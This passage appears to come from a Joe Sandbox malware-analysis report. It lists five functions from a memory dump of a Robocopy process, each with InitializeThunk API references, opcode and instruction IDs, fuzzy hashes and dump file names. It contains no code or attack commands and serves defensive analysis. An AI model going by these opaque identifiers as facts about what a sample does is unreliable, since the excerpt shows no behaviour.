                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: 63a99ac48eeaf8a9799baf585de7f0bb0bce35874ab4308b6326c4e7823e9f42
                                                                                                                                                                              • Instruction ID: 4011b6fb4f592554aea10f6df85e8bda2d2fc07c61c0dad4e566d13b3db4f901
                                                                                                                                                                              • Opcode Fuzzy Hash: 63a99ac48eeaf8a9799baf585de7f0bb0bce35874ab4308b6326c4e7823e9f42
                                                                                                                                                                              • Instruction Fuzzy Hash: 3190023560540C06F150B158441474600058BD0305F55C511A1029658D8795DB9976A2
                                                                                                                                                                              Function 04832BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.3986503169.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047C0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.00000000048E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.00000000048ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.000000000495E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_47c0000_Robocopy.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: 04565e013df6de1b34ef5ca93fc6d815b1f3622a5effa46a9eaf20faaee98f02
                                                                                                                                                                              • Instruction ID: 7834ed739a639bdb22814d0ce85cd3f96ad399131677c8ee6b10f7374843b7b2
                                                                                                                                                                              • Opcode Fuzzy Hash: 04565e013df6de1b34ef5ca93fc6d815b1f3622a5effa46a9eaf20faaee98f02
                                                                                                                                                                              • Instruction Fuzzy Hash: 7890023520544C46F140B1584404A4600158BD0309F55C511A1069698D9665DE99B662
                                                                                                                                                                              Function 04832BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.3986503169.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047C0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.00000000048E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.00000000048ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.000000000495E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_47c0000_Robocopy.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: f56bceaca52be32f9f4a86d9df8992dca91c918a2eaccc59cb3dfa4729ec427f
                                                                                                                                                                              • Instruction ID: 78785ff43cb4114e09bd4765827217aa9c4b554a3c39cb439dda445ea459bf05
                                                                                                                                                                              • Opcode Fuzzy Hash: f56bceaca52be32f9f4a86d9df8992dca91c918a2eaccc59cb3dfa4729ec427f
                                                                                                                                                                              • Instruction Fuzzy Hash: 6690023520140C06F180B158440464A00058BD1305F95C515A102A658DCA55DB9D77A2
                                                                                                                                                                              Function 04832B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.3986503169.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047C0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.00000000048E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.00000000048ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.000000000495E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_47c0000_Robocopy.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: 548a2b868a16b915ae23f1a77b8549e7585ab9abbf5795e3e80b7ac7ea3f3387
                                                                                                                                                                              • Instruction ID: c562f504817917169bbf034302e19d856f168ca88affed75ed41108ae44e9066
                                                                                                                                                                              • Opcode Fuzzy Hash: 548a2b868a16b915ae23f1a77b8549e7585ab9abbf5795e3e80b7ac7ea3f3387
                                                                                                                                                                              • Instruction Fuzzy Hash: AC900265202404076105B1584414616400A8BE0205B55C521E2019594DC565D9D56126
                                                                                                                                                                              Function 04832C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.3986503169.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047C0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.00000000048E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.00000000048ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.000000000495E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_47c0000_Robocopy.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: f6f01a8bd93e17e7b9b6233a17bde2c6ff2691e58d2826697ca59ea827531612
                                                                                                                                                                              • Instruction ID: 78b4252cf9b2f7f12a51458f22d75a4055f3a6711acf3dbc87981453028aa917
                                                                                                                                                                              • Opcode Fuzzy Hash: f6f01a8bd93e17e7b9b6233a17bde2c6ff2691e58d2826697ca59ea827531612
                                                                                                                                                                              • Instruction Fuzzy Hash: CFB09B759015C5C9FB11F760460871779006BD0705F15C961D3034645F4778E1D5E1B6